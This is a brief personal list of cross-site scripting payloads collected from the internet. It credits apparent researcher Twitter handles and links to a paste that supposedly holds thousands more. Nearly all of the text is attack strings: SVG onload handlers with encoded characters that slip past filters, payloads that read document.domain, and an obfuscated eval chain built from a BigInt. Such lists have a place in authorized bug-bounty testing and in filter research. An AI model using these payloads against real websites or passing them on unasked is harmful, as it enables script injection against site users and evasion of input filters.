This is a list of XSS payloads Ive found whlst browsing the Internet
I cant take credit for most of these, so I'll link and credit where i can.


--><Svg OnLoad=(confirm)(`XSS`)><!--
=1</Script/><Svg/OnLoad=(confirm)(`OPENBUGBOUNTY`)>

Twitter : @bohdansec

# <svg onload=prompt%26%230000000040document.domain)>
# <svg onload=prompt%26%23x000000028;document.domain)>
  
Twitter : @aemkei

# x = 91419154914591629164950961951n;[`'${x}'`.replace(/9/g, "\\")].map(eval).map(eval)

Nearly 3 thousand payloads !

https://ghostbin.co/paste/qo23j
